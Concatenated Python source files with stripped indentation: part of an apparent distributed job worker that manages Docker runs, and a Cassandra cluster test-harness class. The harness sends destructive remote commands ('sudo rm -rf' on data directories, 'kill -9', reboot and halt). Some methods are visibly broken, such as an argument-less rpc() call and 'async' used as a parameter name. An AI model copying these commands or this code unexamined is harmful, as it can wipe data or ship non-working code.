# object to include or delete those fields specified from the RunState object
if field in run_state._fields:
values.append(getattr(run_state, field))
else:
values.append(None)
self.runs[uuid] = RunState(*values)
def check_idle_stop(self):
"""
Checks whether the worker is idle (ie if it hasn't had runs for longer than the configured
number of idle seconds) and if so, checks whether it is configured to exit when idle.
:returns: True if the worker should stop because it is idle.
In other words, True if the worker is configured to exit when idle,
it is idle, and it has checked in at least once with the server.
"""
now = time.time()
if len(self.runs) > 0 or self.last_time_ran is None:
self.last_time_ran = now
idle_duration_seconds = now - self.last_time_ran
if (
self.exit_when_idle
and idle_duration_seconds > self.idle_seconds
and self.last_checkin_successful
):
logger.warning(
"Worker was idle for {} seconds. Exiting...".format(idle_duration_seconds)
)
return True
return False
def check_num_runs_stop(self):
"""
Checks whether the worker has finished the number of job allowed to run.
:return: True if the number of jobs allowed to run is 0 and all those runs are finished.
False if neither of the two conditions are met.
"""
return self.exit_after_num_runs == self.num_runs and len(self.runs) == 0
def start(self):
"""Return whether we ran anything."""
self.load_state()
self.sync_state()
self.image_manager.start()
if not self.shared_file_system:
self.dependency_manager.start()
while not self.terminate:
try:
self.checkin()
last_checkin = time.time()
# Process runs until it's time for the next checkin.
while not self.terminate and (
time.time() - last_checkin <= self.checkin_frequency_seconds
):
self.check_termination()
self.save_state()
if self.check_idle_stop() or self.check_num_runs_stop():
self.terminate = True
break
self.process_runs()
time.sleep(0.003)
self.save_state()
except Exception:
self.last_checkin_successful = False
if using_sentry():
capture_exception()
traceback.print_exc()
if self.exit_on_exception:
logger.warning(
'Encountered exception, terminating the worker after sleeping for 5 minutes...'
)
self.terminate = True
# Sleep for 5 minutes
time.sleep(5 * 60)
else:
# Sleep for a long time so we don't keep on failing.
# We sleep in 5-second increments to check
# if the worker needs to terminate (say, if it's received
# a SIGTERM signal).
logger.warning('Sleeping for 1 hour due to exception...please help me!')
for _ in range(12 * 60):
# We run this here, instead of going through another iteration of the
# while loop, to minimize the code that's run---the reason we ended up here
# in the first place is because of an exception, so we don't want to
# re-trigger that exception.
if self.terminate_and_restage:
# If self.terminate_and_restage is true, self.check_termination()
# restages bundles. We surround this in a try-except block,
# so we can still properly terminate and clean up
# even if self.check_termination() fails for some reason.
try:
self.check_termination()
except Exception:
traceback.print_exc()
self.terminate = True
if self.terminate:
break
time.sleep(5)
self.cleanup()
def cleanup(self):
"""
Starts any necessary cleanup and propagates to its other managers
Blocks until cleanup is complete and it is safe to quit
"""
logger.info("Stopping Worker")
self.image_manager.stop()
if not self.shared_file_system:
self.dependency_manager.stop()
self.run_state_manager.stop()
self.save_state()
if self.delete_work_dir_on_exit:
shutil.rmtree(self.work_dir)
try:
self.worker_docker_network.remove()
self.docker_network_internal.remove()
self.docker_network_external.remove()
except docker.errors.APIError as e:
logger.warning("Cannot clear docker networks: %s", str(e))
logger.info("Stopped Worker. Exiting")
def signal(self):
"""
When the pass_down_termination flag is False, set the stop flag to stop running
the worker without changing the status of existing running bundles. Otherwise,
set the terminate_and_restage flag to restage all bundles that are not in the
terminal states [FINISHED, RESTAGED].
"""
if not self.pass_down_termination:
self.terminate = True
else:
self.terminate_and_restage = True
def check_termination(self):
"""
If received pass_down_termination signal from CLI to terminate the worker, wait until
all the existing unfinished bundles are restaged, reset runs, then stop the worker.
"""
if self.terminate_and_restage:
if self.restage_bundles() == 0:
# Stop the worker
self.terminate = True
# Reset the current runs to exclude bundles in terminal states
# before save state one last time to worker-state.json
self.runs = {
uuid: run_state
for uuid, run_state in self.runs.items()
if run_state.stage not in [RunStage.FINISHED, RunStage.RESTAGED]
}
def restage_bundles(self):
"""
Restage bundles not in the final states [FINISHED and RESTAGED] from worker to server.
:return: the number of restaged bundles
"""
restaged_bundles = []
terminal_stages = [RunStage.FINISHED, RunStage.RESTAGED]
for uuid in self.runs:
run_state = self.runs[uuid]
if run_state.stage not in terminal_stages:
self.restage_bundle(uuid)
restaged_bundles.append(uuid)
if len(restaged_bundles) > 0:
logger.info(
"Sending bundles back to the staged state: {}.".format(','.join(restaged_bundles))
)
return len(restaged_bundles)
@property
def cached_dependencies(self):
"""
Returns a list of the keys (as tuples) of all bundle dependencies this worker
has cached, in the format the server expects it in the worker check-in.
If the worker is on shared file system, it doesn't cache any dependencies and an
empty list is returned even though all dependencies are accessible on the shared
file system.
"""
if self.shared_file_system:
return []
else:
return [
(dep_key.parent_uuid, dep_key.parent_path)
for dep_key in self.dependency_manager.all_dependencies
]
def checkin(self):
"""
Checkin with the server and get a response. React to this response.
This function must return fast to keep checkins frequent. Time consuming
processes must be handled asynchronously.
"""
request = {
'tag': self.tag,
'group_name': self.group_name,
'cpus': len(self.cpuset),
'gpus': len(self.gpuset),
'memory_bytes': self.max_memory,
'free_disk_bytes': self.free_disk_bytes,
'dependencies': self.cached_dependencies,
'hostname': socket.gethostname(),
'runs': [run.as_dict for run in self.all_runs],
'shared_file_system': self.shared_file_system,
'tag_exclusive': self.tag_exclusive,
'exit_after_num_runs': self.exit_after_num_runs - self.num_runs,
'is_terminating': self.terminate or self.terminate_and_restage,
'preemptible': self.preemptible,
}
try:
response = self.bundle_service.checkin(self.id, request)
logger.info('Connected! Successful check in!')
self.last_checkin_successful = True
except BundleServiceException as ex:
logger.warning("Disconnected from server! Failed check in: %s", ex)
if not self.last_checkin_successful:
logger.info(
"Checkin failed twice in a row, sleeping %d seconds", self.CHECKIN_COOLDOWN
)
time.sleep(self.CHECKIN_COOLDOWN)
self.last_checkin_successful = False
response = None
# Stop processing any new runs received from server
if not response or self.terminate_and_restage or self.terminate:
return
action_type = response['type']
logger.debug('Received %s message: %s', action_type, response)
if action_type == 'run':
self.initialize_run(response['bundle'], response['resources'])
else:
uuid = response['uuid']
socket_id = response.get('socket_id', None)
if uuid not in self.runs:
if action_type in ['read', 'netcat']:
self.read_run_missing(socket_id)
return
if action_type == 'kill':
self.kill(uuid)
elif action_type == 'mark_finalized':
self.mark_finalized(uuid)
elif action_type == 'read':
self.read(socket_id, uuid, response['path'], response['read_args'])
elif action_type == 'netcat':
self.netcat(socket_id, uuid, response['port'], response['message'])
elif action_type == 'write':
self.write(uuid, response['subpath'], response['string'])
else:
logger.warning("Unrecognized action type from server: %s", action_type)
def process_runs(self):
""" Transition each run then filter out finished runs """
# We (re-)initialize the Docker networks here, in case they've been removed.
# For any networks that exist, this is essentially a no-op.
self.init_docker_networks(self.docker_network_prefix, verbose=False)
# In case the docker networks have changed, we also update them in the RunStateMachine
self.run_state_manager.worker_docker_network = self.worker_docker_network
self.run_state_manager.docker_network_external = self.docker_network_external
self.run_state_manager.docker_network_internal = self.docker_network_internal
# 1. transition all runs
for uuid in self.runs:
prev_state = self.runs[uuid]
self.runs[uuid] = self.run_state_manager.transition(prev_state)
# Only start saving stats for a new stage when the run has actually transitioned to that stage.
if prev_state.stage != self.runs[uuid].stage:
self.end_stage_stats(uuid, prev_state.stage)
if self.runs[uuid].stage not in [RunStage.FINISHED, RunStage.RESTAGED]:
self.start_stage_stats(uuid, self.runs[uuid].stage)
# 2. filter out finished runs and clean up containers
finished_container_ids = [
run.container
for run in self.runs.values()
if (run.stage == RunStage.FINISHED or run.stage == RunStage.FINALIZING)
and run.container_id is not None
]
for container_id in finished_container_ids:
try:
container = self.docker.containers.get(container_id)
container.remove(force=True)
except (docker.errors.NotFound, docker.errors.NullResource):
pass
# 3. reset runs for the current worker
self.runs = {
uuid: run_state
for uuid, run_state in self.runs.items()
if run_state.stage != RunStage.FINISHED
}
def assign_cpu_and_gpu_sets(self, request_cpus, request_gpus):
"""
Propose a cpuset and gpuset to a bundle based on given requested resources.
Note: no side effects (this is important: we don't want to maintain more state than necessary)
Arguments:
request_cpus: integer
request_gpus: integer
Returns a 2-tuple:
cpuset: assigned cpuset (str indices).
gpuset: assigned gpuset (str indices).
Throws an exception if unsuccessful.
"""
cpuset, gpuset = set(map(str, self.cpuset)), set(map(str, self.gpuset))
for run_state in self.runs.values():
if run_state.stage == RunStage.RUNNING:
cpuset -= run_state.cpuset
gpuset -= run_state.gpuset
if len(cpuset) < request_cpus:
raise Exception(
"Requested more CPUs (%d) than available (%d currently out of %d on the machine)"
% (request_cpus, len(cpuset), len(self.cpuset))
)
if len(gpuset) < request_gpus:
raise Exception(
"Requested more GPUs (%d) than available (%d currently out of %d on the machine)"
% (request_gpus, len(gpuset), len(self.gpuset))
)
def propose_set(resource_set, request_count):
return set(str(el) for el in list(resource_set)[:request_count])
return propose_set(cpuset, request_cpus), propose_set(gpuset, request_gpus)
@property
def all_runs(self):
"""
Returns a list of all the runs managed by this RunManager
"""
return [
BundleCheckinState(
uuid=run_state.bundle.uuid,
run_status=run_state.run_status,
bundle_start_time=run_state.bundle_start_time,
container_time_total=run_state.container_time_total,
container_time_user=run_state.container_time_user,
container_time_system=run_state.container_time_system,
docker_image=run_state.docker_image,
state=RunStage.WORKER_STATE_TO_SERVER_STATE[run_state.stage],
remote=self.id,
exitcode=run_state.exitcode,
failure_message=run_state.failure_message,
bundle_profile_stats=run_state.bundle_profile_stats,
cpu_usage=run_state.cpu_usage,
memory_usage=run_state.memory_usage,
)
for run_state in self.runs.values()
]
@property
def free_disk_bytes(self):
"""
Available disk space by bytes of this RunManager.
"""
error_msg = "Failed to run command {}".format("df -k" + self.work_dir)
try:
# Option "-k" will ensure us with the returning disk space in 1KB units
p = Popen(["df", "-k", self.work_dir], stdout=PIPE)
output, error = p.communicate()
# Return None when there is an error.
if error:
logger.error(error.strip() + ": {}".format(error))
return None
if output:
lines = output.decode().split("\n")
headers = lines[0].split()
# The machine being attached as a worker may be using a different language other than
# English, so check the 4th header if "Available" is not present.
index = headers.index("Available") if "Available" in headers else 3
# We convert the original result from df command in unit of 1KB units into bytes.
return int(lines[1].split()[index]) * 1024
except Exception as e:
logger.error("{}: {}".format(error_msg, str(e)))
return None
def initialize_run(self, bundle, resources):
"""
First, checks if the worker has already finished receiving/starting the number of jobs allowed to run.
If not, returns immediately.
Then, checks in with the bundle service and sees if the bundle is still assigned to this worker.
If not, returns immediately.
Otherwise, tell RunManager to create the run.
"""
if self.exit_after_num_runs == self.num_runs:
print(
'Worker has finished starting the number of jobs allowed to run on: {}. '
'Stop starting further runs.'.format(self.exit_after_num_runs),
file=sys.stdout,
)
return
now = time.time()
start_message = {'hostname': socket.gethostname(), 'start_time': int(now)}
if self.bundle_service.start_bundle(self.id, bundle['uuid'], start_message):
bundle = BundleInfo.from_dict(bundle)
resources = RunResources.from_dict(resources)
if self.terminate:
# Run Manager stopped, refuse more runs
return
bundle_path = (
bundle.location
if self.shared_file_system
else os.path.join(self.local_bundles_dir, bundle.uuid)
)
self.runs[bundle.uuid] = RunState(
stage=RunStage.PREPARING,
run_status='',
bundle=bundle,
bundle_path=os.path.realpath(bundle_path),
bundle_dir_wait_num_tries=Worker.BUNDLE_DIR_WAIT_NUM_TRIES,
bundle_profile_stats={
RunStage.PREPARING: self.init_stage_stats(),
RunStage.RUNNING: self.init_stage_stats(),
RunStage.CLEANING_UP: self.init_stage_stats(),
RunStage.UPLOADING_RESULTS: self.init_stage_stats(),
RunStage.FINALIZING: self.init_stage_stats(),
},
resources=resources,
bundle_start_time=time.time(),
container_time_total=0,
container_time_user=0,
container_time_system=0,
container_id=None,
container=None,
docker_image=None,
is_killed=False,
has_contents=False,
cpuset=None,
gpuset=None,
max_memory=0,
disk_utilization=0,
exitcode=None,
failure_message=None,
kill_message=None,
finished=False,
finalized=False,
is_restaged=False,
cpu_usage=0.0,
memory_usage=0.0,
paths_to_remove=[],
)
# Start measuring bundle stats for the initial bundle state.
self.start_stage_stats(bundle.uuid, RunStage.PREPARING)
# Increment the number of runs that have been successfully started on this worker
self.num_runs += 1
else:
print(
'Bundle {} no longer assigned to this worker'.format(bundle['uuid']),
file=sys.stdout,
)
def kill(self, uuid):
"""
Marks the run as killed so that the next time its state is processed it is terminated.
"""
self.runs[uuid] = self.runs[uuid]._replace(kill_message='Kill requested', is_killed=True)
def restage_bundle(self, uuid):
"""
Marks the run as restaged so that it can be sent back to the STAGED state before the worker is terminated.
"""
self.runs[uuid] = self.runs[uuid]._replace(is_restaged=True)
def mark_finalized(self, uuid):
"""
Marks the run with uuid as finalized so it might be purged from the worker state
"""
self.runs[uuid] = self.runs[uuid]._replace(finalized=True)
def read(self, socket_id, uuid, path, args):
def reply(err, message={}, data=None):
self.bundle_service_reply(socket_id, err, message, data)
try:
run_state = self.runs[uuid]
self.reader.read(run_state, path, args, reply)
except BundleServiceException:
traceback.print_exc()
except Exception as e:
traceback.print_exc()
err = (http.client.INTERNAL_SERVER_ERROR, str(e))
reply(err)
def netcat(self, socket_id, uuid, port, message):
"""
Sends `message` to `port` of the Docker container of the run with `uuid` and
streams the response on `socket_id`.
This is all done on an unmanaged thread (ie launched and forgotten) because
the thread has no further effects on the run as far as the worker is concerned
and we do not need to terminate/join the thread from the worker process. It just
terminates when the user is done with their connection or the Docker container for
the run terminates.
"""
def reply(err, message={}, data=None):
self.bundle_service_reply(socket_id, err, message, data)
def netcat_fn():
try:
run_state = self.runs[uuid]
container_ip = docker_utils.get_container_ip(
self.worker_docker_network.name, run_state.container
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((container_ip, port))
s.sendall(message.encode())
total_data = []
while True:
data = s.recv(Worker.NETCAT_BUFFER_SIZE)
if not data:
break
total_data.append(data)
s.close()
reply(None, {}, b''.join(total_data))
except BundleServiceException:
traceback.print_exc()
except Exception as e:
traceback.print_exc()
err = (http.client.INTERNAL_SERVER_ERROR, str(e))
reply(err)
threading.Thread(target=netcat_fn).start()
def write(self, uuid, path, string):
run_state = self.runs[uuid]
if os.path.normpath(path) in set(dep.child_path for dep in run_state.bundle.dependencies):
return
def write_fn():
with open(os.path.join(run_state.bundle_path, path), 'w') as f:
f.write(string)
threading.Thread(target=write_fn).start()
def upload_bundle_contents(
self, bundle_uuid, bundle_path, exclude_patterns, store, update_status
):
self.execute_bundle_service_command_with_retry(
lambda: self.bundle_service.update_bundle_contents(
self.id, bundle_uuid, bundle_path, exclude_patterns, store, update_status
)
)
def read_run_missing(self, socket_id):
message = {
'error_code': http.client.INTERNAL_SERVER_ERROR,
'error_message': BUNDLE_NO_LONGER_RUNNING_MESSAGE,
}
self.bundle_service.reply(self.id, socket_id, message)
def bundle_service_reply(self, socket_id, err, message, data):
if err:
err = {'error_code': err[0], 'error_message': err[1]}
self.bundle_service.reply(self.id, socket_id, err)
elif data:
self.bundle_service.reply_data(self.id, socket_id, message, data)
else:
self.bundle_service.reply(self.id, socket_id, message)
def start_stage_stats(self, uuid: str, stage: str) -> None:
"""
Set the start time for a bundle in a certain stage.
"""
self.runs[uuid].bundle_profile_stats[stage]['start'] = time.time()
def end_stage_stats(self, uuid: str, stage: str) -> None:
"""
Set the end time for a bundle finishing a stage.
Set the elapsed time to the end time minus the start time.
"""
self.runs[uuid].bundle_profile_stats[stage]['end'] = time.time()
self.runs[uuid].bundle_profile_stats[stage]['elapsed'] = (
self.runs[uuid].bundle_profile_stats[stage]['end']
- self.runs[uuid].bundle_profile_stats[stage]['start']
)
def init_stage_stats(self) -> Dict:
"""
Returns a stage stats dict with default empty values for start, end, and elapsed.
"""
return {'start': None, 'end': None, 'elapsed': None}
@staticmethod
def execute_bundle_service_command_with_retry(cmd):
retries_left = Worker.COMMAND_RETRY_ATTEMPTS
while True:
try:
retries_left -= 1
cmd()
return
except BundleServiceException as e:
if not e.client_error and retries_left > 0:
traceback.print_exc()
time.sleep(30)
continue
raise
|
cassandra_class.py
|
"""
The MIT License (MIT)
Copyright (c) Datos IO, Inc. 2015.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import time
import threading
from random import randint
import common.common
from common.common import report, rpc, scp, pause_execution_for_input
from db_utils.database import DatabaseCluster
from common.network_traffic_control import NetworkTrafficControl
from db_utils.cassandra_utils.failures import CassandraFailures
from db_utils.cassandra_utils.data_population import CassandraTestingCluster, do_insert
class Cassandra(DatabaseCluster): # TODO: (Aaron) Handle non service installs.
def __init__(self, source_params):
DatabaseCluster.__init__(self)
self.source_params = source_params
self.type = 'cassandra'
self.payload = False
# Require some params. Fail early if not in configuration file.
required_params = [
'source-name',
'username',
'password',
'key',
'ips',
'data_dir',
]
for param in required_params:
assert(param in source_params), 'Param not found: %s' % param
self.installed_as_service = True # TODO: (Aaron) Need to work on this to be flexible for non service.
self.name = source_params['source-name']
self.ip = source_params['ips'][0] # For convenience.
self.ips = source_params['ips']
self.username = source_params['username']
self.password = source_params['password']
self.key = source_params['key']
self.data_dir = source_params['data_dir']
self.commitlog_dir = source_params['commit_dir'] if 'commit_dir' in source_params else source_params['data_dir'] + '/../commitlog'
self.restore_dir = source_params['restore_dir'] if 'restore_dir' in source_params else ''
self.cassandra_dir = source_params['cass_dir'] if 'cass_dir' in source_params else source_params['data_dir']
self.db_user = source_params['db_user'] if 'db_user' in source_params else ''
self.db_pass = source_params['db_pass'] if 'db_pass' in source_params else ''
# Create a faults instance.
self.failures = CassandraFailures(self)
# Create a network control instance.
self.network = NetworkTrafficControl(self.ips, self.username, self.password, self.key)
self.do_delta_population = False
self.do_mass_population = False
def _deliver_payload(self):
"""
Delivers population scripts and other goodies to the cassandra source cluster. Most stored in ~/.geppetto/
"""
common_script_path = '%s/common/common.py' % (common.common.global_vars['geppetto_install_dir'])
population_script_path = '%s/db_utils/cassandra_utils/data_population.py' % (common.common.global_vars['geppetto_install_dir'])
schema_folder_path = '%s/db_utils/cassandra_utils/schema' % (common.common.global_vars['geppetto_install_dir'])
for ip in self.ips:
report('Updating Geppetto payload on {%s}.' % ip)
to_path = '%s@%s:~/.geppetto/' % (self.username, ip)
# rpc(ip, 'rm -rf ~/.geppetto', self.username, self.password, self.key, suppress_output=True)
rpc(ip, 'mkdir -p ~/.geppetto/common', self.username, self.password, self.key, suppress_output=True)
rpc(ip, 'touch ~/.geppetto/common/__init__.py', self.username, self.password, self.key, suppress_output=True)
scp(common_script_path, '%s/common/' % to_path, self.password, self.key, suppress_output=True)
scp(population_script_path, to_path, self.password, self.key, suppress_output=True)
scp(schema_folder_path, to_path, self.password, self.key, is_dir=True, suppress_output=True)
self.payload = True
return True
def nodetool_status(self):
# Cycle through the nodes until we get a result from nodetool status.
for ip in self.source_params['ips']:
out, err = rpc(ip, "nodetool status | grep 'UN\|UL\|UJ\|UM\|DN\|DL\|DJ\|DM\|===='", self.username, self.password, self.key, suppress_output=True)
if any(x in out for x in ['UN', 'UL', 'UJ', 'UM', 'DN', 'DL', 'DJ', 'DM']):
return out
response = pause_execution_for_input('No status received from Cassandra Nodetool', level='info')
if response == 'r':
self.nodetool_status()
def cfstats(self):
# Cycle through the nodes until we get a result from nodetool cfstats.
for ip in self.ips:
out, _ = rpc(ip, "nodetool cfstats", self.username, self.password, self.key)
# TODO: (Aaron) finish ...
return out
def status(self):
return self.nodetool_status()
def db_stop(self, ip):
rpc(ip, 'sudo service cassandra stop', self.username, self.password, self.key, timeout=60*2)
def db_start(self, ip):
rpc(ip, 'sudo service cassandra start', self.username, self.password, self.key, timeout=60*2)
def node_reboot(self, ip):
rpc(ip, 'sudo reboot now', self.username, self.password, self.key, timeout=60*2)
def node_shutdown(self, ip):
rpc(ip, 'sudo halt', self.username, self.password, self.key, timeout=60*2)
def node_restore(self, ip):
pass
def shutdown(self):
"""
Shutdown the whole db cluster.
"""
for ip in self.ips:
rpc(ip, 'sudo service cassandra stop', self.username, self.password, self.key, timeout=60*2)
def query(self, query, no_pause=False, suppress_reporting=False, retries=5):
"""
Performs a cql query on the database.
"""
assert(retries >= 0)
# Format the query and make sure we have trailing ';'
query = query.strip(' ')
if not query:
return
if query[-1] != ';':
query += ' ;'
cluster = CassandraTestingCluster(self.ips, self.db_user, self.db_pass)
if not cluster.connect():
report('Error cannot connect to Cassandra cluster', 'critical')
if not no_pause:
response = pause_execution_for_input('Error cannot connect to Cassandra cluster.')
if response == 'r':
result, success = self.query(query)
else:
return '', False
else:
return '', False
else:
# Persistent retry, then prompt use for action if still error.
i = 0
wait_times = [0, 5, 15, 60, 60,]
result, success = '', False
while i <= retries:
if not suppress_reporting:
report(query)
result, success = cluster.runQuery(query)
if success or i >= retries:
break
if not suppress_reporting:
report(result, 'warning')
report(success, 'warning')
retry_time = wait_times[min(i, len(wait_times) - 1)]
if not suppress_reporting:
report('Retrying in %s seconds' % retry_time)
time.sleep(retry_time)
i += 1
# If retries did not produce successful query, then prompt user for input if we allow pausing.
if not success and not no_pause:
response = pause_execution_for_input('Error')
if response == 'r': # 'retry'.
result, success = self.query(query, retries=0) # Only try once on manual retries.
cluster.disconnect()
return result, success
def insert(self, mgmt_object, schema_file, record_size, start_record, record_count, uuid4=None, suppress_reporting=False, cluster=None):
"""
Does batch inserts into db from geppetto node.
"""
if not cluster:
cluster = CassandraTestingCluster(self.ips, self.db_user, self.db_pass)
if not cluster.connect():
report('ERROR: cannot connect to Cassandra cluster', 'critical')
sys.exit(-1)
if uuid4:
if not suppress_reporting : report('%s do_insert(%s, %s, %s, %s, %s, %s, %s)' % (self.name, 'cluster', mgmt_object, schema_file, record_size, start_record, record_count, uuid4))
do_insert(cluster, mgmt_object, schema_file, record_size, start_record, record_count, uuid4, suppress_output=suppress_reporting)
else:
if not suppress_reporting : report('%s do_insert(%s, %s, %s, %s, %s, %s)' % (self.name, 'cluster', mgmt_object, schema_file, record_size, start_record, record_count))
do_insert(cluster, mgmt_object, schema_file, record_size, start_record, record_count, suppress_output=suppress_reporting)
if not cluster:
cluster.disconnect()
def mass_population(self, schema_file='~/.geppetto/schema/schema1.txt', record_size=1024, start_record=1, record_count=50, mgmt_object='ks1.table1', replication=3, on_max_nodes=3, async=True):
"""
Sets mass population on the cassandra cluster. Runs a script on multiple nodes.
"""
if 'geppetto/schema' not in schema_file:
schema_file = '~/.geppetto/schema/cassandra/' + schema_file
if not self.payload:
self._deliver_payload()
# Need to start separate thread ...
self.do_mass_population = True
population_ips = self.ips[:on_max_nodes]
def mass_worker():
record_count_per_node = int(record_count / len(population_ips))
node_start_record = start_record
auth_string = ''
if self.db_user:
auth_string = '--db_user %s --db_pass %s' % (self.db_user, self.db_pass)
for ip in population_ips:
report('Setting mass population on cluster {%s} node {%s}.' % (self.name, ip), 'warning')
# Clean log first.
cmd = 'sudo rm /tmp/mass_population.log'
rpc(ip, cmd, self.username, self.password, self.key)
cmd = '(python ~/.geppetto/data_population.py ' \
'%s %s %s ' \
'insert ' \
'-r %s ' \
'-s %s ' \
'-n %s ' \
'-t %s ' \
'--replication %s ' \
') > /tmp/mass_population.log &' % \
(ip, schema_file, auth_string,
record_size,
node_start_record,
record_count_per_node,
mgmt_object,
replication)
node_start_record += record_count_per_node
rpc(ip, cmd, self.username, self.password, self.key, no_tty=True) # No tty so we can run as bg & disconnect.
if not async:
cmd = 'ps -ef | grep geppetto | grep -v grep | wc -l'
cmd2 = 'tail -1 /tmp/mass_population.log'
while True:
try:
report('Populating ...')
processes_running = 0
for ip in population_ips:
out, err = rpc(ip, cmd, self.username, self.password, self.key, suppress_output=True)
out2, err2 = rpc(ip, cmd2, self.username, self.password, self.key, suppress_output=True)
report('<%s> %s' % (ip, out2))
try:
processes_running += int(out)
except Exception as e:
report(e, 'critical')
raise
if processes_running == 0:
break
except Exception as e:
report(e, 'critical')
break
time.sleep(15)
mass_worker()
def delta_population(self, schema_file='~/.geppetto/schema/schema1.txt', record_size=1024, start_record=1, mgmt_object='ks1.table1', insert_percentage=70, bytes_per_hour=1, replication=3):
"""
Creates a delta population on the cassandra cluster. Runs a script on one cassandra node and checks status.
:param record_size: Record size.
:param start_record: Starting record number.
:param mgmt_object: keyspace.table format.
:param insert_percentage: Insert percentage.
:return:
"""
DELAY_MS = 1000
LOOP_MIN = 5 # Minimum of 1
if not self.payload:
self._deliver_payload()
workload_ip = self.ips[randint(0, len(self.ips) - 1)]
# Need to start separate thread ...
self.do_delta_population = True
# Do rate calculations.
records_per_hour = max(1, bytes_per_hour / record_size)
records_per_min = max(1, records_per_hour / 60)
records_per_interval = records_per_min * LOOP_MIN
# Batch calculations.
num_batches = max(60 * 1, 60 * (LOOP_MIN - 1)) # We keep an empty minute at the end for everything to complete and reduce stress on system.
batch_size = max(1, records_per_interval / num_batches)
# If we don't need that many batches, recalculate the num_batches and batch_size.
if records_per_interval < num_batches:
num_batches = records_per_interval # We know this should be done 1 minute before next loop.
batch_size = 1
# Build command to stop previous delta populations.
cmd1 = '''ps -ef | grep gepp | grep -v grep | grep %s | grep "\-b" | tr -s " " | cut -d" " -f2 | xargs kill''' % mgmt_object
auth_string = ''
if self.db_user:
auth_string = '--db_user %s --db_pass %s' % (self.db_user, self.db_pass)
cmd2 = '(python ~/.geppetto/data_population.py ' \
'%s %s %s ' \
'update ' \
'-r %s ' \
'-s %s ' \
'-t %s ' \
'-i %s ' \
'-b %s ' \
'-d %s ' \
'-c %s ' \
'--replication %s ' \
') > /tmp/delta_updater.log &' % \
(workload_ip, schema_file, auth_string,
record_size,
start_record,
mgmt_object,
insert_percentage,
batch_size,
DELAY_MS,
num_batches,
replication)
def delta_worker():
# Loop every 5 minutes and reinitialize delta.
while self.do_delta_population:
# Stop previous populations, in the case they are still going.
rpc(workload_ip, cmd1, self.username, self.password, self.key)
time.sleep(2)
# Start new batch of populations.
rpc(workload_ip, cmd2, self.username, self.password, self.key, no_tty=True) # No tty so we can run as bg & disconnect.
report('{%s} delta population set on node %s.' % (mgmt_object, workload_ip))
time.sleep(60 * LOOP_MIN) # Sleep LOOP_MIN min, allow delta to complete and settle, then cycle again. (A more dependable way)
t = threading.Thread(target=delta_worker)
t.setDaemon(True)
t.start()
def stop_mass_population(self):
self.do_mass_population = False
cmd = '''ps -ef | grep -v grep | grep geppetto | awk '{print $2}' | xargs kill -9'''
for ip in self.ips:
rpc(ip, cmd, self.username, self.password, self.key)
def stop_delta_population(self):
self.do_delta_population = False
def stop_population(self):
"""
Stops both delta and mass population on this cluster.
"""
self.stop_mass_population()
self.stop_delta_population()
def clean(self):
"""
Caution! Empties database directories and commit logs for all nodes in db.
:return:
"""
report('Cleaning data and commitlog directories for cluster {%s}' % (self.name), 'warning')
cmd = 'sudo service cassandra stop'
for ip in self.ips:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(10)
cmd_list = [
'rm -f ~/.__jmxcmd*',
'sudo rm -rf %s/*' % self.data_dir,
'sudo rm -rf %s/*' % self.commitlog_dir,
'sudo service cassandra start',
]
for ip in self.ips[:1]:
for cmd in cmd_list:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(30)
for ip in self.ips[1:]:
for cmd in cmd_list:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(30)
report('Status cluster {%s} \n %s' % (self.name, self.status()))
def remove(self, ks, table=None):
"""
Removes ks or table from db.
:param table: If provided, only drops this table from given keyspace else drops whole keyspace.
"""
if table:
# TODO: (Aaron) Fix check for if it exists.
# cql = "SELECT columnfamily_name FROM system.schema_columnfamilies WHERE keyspace_name = '%s' ;" % (ks)
# result, success = self.query(cql, no_pause=True)
# If the table does not exist yet short circuit, else we can continue to drop that table.
# if not table in str(result):
# return
cql = 'DROP TABLE %s.%s ;' % (ks, table)
else:
# TODO: (Aaron) Fix check for if it exists.
# Check to see if the KS exists, if so do nothing.
# cql = 'SELECT * FROM system.schema_keyspaces;' # Grab keyspaces.
# result, success = self.query(cql, no_pause=True)
# if not ks in str(result[0]):
# return
cql = 'DROP KEYSPACE %s ;' % ks
result, success = self.query(cql, no_pause=True)
return result, success
def set_compaction_strategy(self, strategy, ks, table):
"""
Sets the compaction strategy on a cassandra table for a given cluster.
:param strategy: Cassandra compaction strategy to use. Valid strategies are: 'STCS', 'DTCS', 'LCS'.
:param ks: Keyspace.
:param table: Table.
:return: None
"""
if strategy == 'STCS':
strategy = 'SizeTieredCompactionStrategy'
elif strategy == 'DTCS':
strategy = 'DateTieredCompactionStrategy'
elif strategy == 'LCS':
strategy = 'LeveledCompactionStrategy'
assert(strategy in ['SizeTieredCompactionStrategy', 'DateTieredCompactionStrategy', 'LeveledCompactionStrategy'])
cql = ''
if strategy == 'SizeTieredCompactionStrategy':
cql = "ALTER TABLE %s.%s WITH compaction = {'class' : 'SizeTieredCompactionStrategy', 'min_threshold' : 6 } ;" % (ks, table)
elif strategy == 'DateTieredCompactionStrategy':
cql = "ALTER TABLE %s.%s WITH compaction = {'class' : 'DateTieredCompactionStrategy' } ;" % (ks, table)
elif strategy == 'LeveledCompactionStrategy': # Explicit with this else.
cql = "ALTER TABLE %s.%s WITH compaction = { 'class' : 'LeveledCompactionStrategy' } ;" % (ks, table)
self.query(cql)
def get_compaction_history(self):
cmd = 'nodetool compactionhistory'
for ip in self.ips:
try:
out, err = rpc()
return out
except:
pass
return ''
|
test_pastebin_plugin.py
|
import logging
import re
import socket
import threading
import time
import tkinter
import traceback
